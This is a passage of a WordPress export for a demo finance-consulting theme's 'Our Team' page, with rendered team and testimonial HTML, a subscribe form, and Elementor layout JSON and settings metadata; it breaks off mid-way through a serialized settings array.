																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Kate Green</h6>				CHIEF FINANCIAL OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team8.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team8.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team8-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Harry Septem</h6>				co-founder of company			
	        our benefits	        <h2>Entrust Your Project to  Our Specialists</h2>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
										<img width="959" height="650" src="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg 959w, https://maxbizz.s3.amazonaws.com/images/image1-team-1-300x203.jpg 300w, https://maxbizz.s3.amazonaws.com/images/image1-team-1-768x521.jpg 768w" sizes="(max-width: 959px) 100vw, 959px" />											
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>690</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:37:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:37:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[691]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"c0972f9","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"a497b47","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"851ebdc","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5cea06f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"3c8329c","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"d1c3196","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"e34f121","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"051be26","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"4dda4d5","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7893ae6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2bcb443","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"FINANCE MANAGER ","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c6f2cd2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3045fbb","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"05a209e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2585422","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"3f0bea3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"659956f","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"b1c7f19","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"419a6b1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"65aaf12","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team5.jpg","id":694},"member_name":"Mary Flynn","member_extra":"CHIEF TECHNOLOGY OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"2b58641","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"23fa50d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team6.jpg","id":695},"member_name":"Adam Oswald","member_extra":"CHIEF MARKETING OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"42171b0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1c6c26d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team7.jpg","id":696},"member_name":"Kate Green","member_extra":"CHIEF FINANCIAL OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"23f0a2f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"df675fc","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team8.jpg","id":697},"member_name":"Harry Septem","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"b3c9551","elType":"section","settings":{"layout":"full_width","gap":"no","content_position":"middle","structure":"20"},"elements":[{"id":"cfc4ff2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"background_background":"classic","background_color":"#061E2F","_inline_size_tablet":100},"elements":[{"id":"6f8488f","elType":"section","settings":{"content_width":{"unit":"px","size":525,"sizes":[]},"css_classes":"mr_0","padding":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"padding_tablet":{"unit":"%","top":"10","right":"20","bottom":"10","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"4e25f9a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"a001cee","elType":"widget","settings":{"sub":"our benefits","title":"Entrust Your Project to  Our Specialists","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"6a5318a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","text_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0ba065e","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"},{"id":"1df2f14","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"},{"id":"24c3ac5","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","lbar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"337cb49","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d6d5985","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-team.jpg","id":699},"image_size":"full","_margin_mobile":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a9b5cf2","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"192","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"140","left":"0","isLinked":false}},"elements":[{"id":"4e2afe0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"78c7db3","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e4b3144","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"7e32710","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"5aa0738","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"bf1cbf3","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"d1cccc6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"398c80a","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2580},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2580},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true","name_typography_typography":"custom","name_typography_font_weight":"400"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"75d2d13","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"background_background":"classic","padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"b0228da","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3feda11","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#52C5B6","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"0ee7b7f","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"ded639d","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"9aa4329","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"f071196","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:6:"column";a:3:{s:5:"count";i:22;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:22;s:19:"_inline_size_tablet";i:18;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:1;s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:8:{s:9:"stitle_bg";i:3;s:27:"title_typography_typography";i:3;s:33:"title_typography_font_size_mobile";i:3;s:28:"stitle_typography_typography";i:3;s:27:"stitle_typography_font_size";i:3;s:12:"stitle_color";i:3;s:29:"stitle_typography_font_weight";i:3;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:4:{s:6:"layout";i:5;s:3:"gap";i:3;s:13:"content_width";i:2;s:16:"content_position";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:8:{s:7:"padding";i:7;s:14:"padding_mobile";i:6;s:11:"css_classes";i:1;s:14:"padding_tablet";i:2;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:5:{s:19:"background_position";i:2;s:17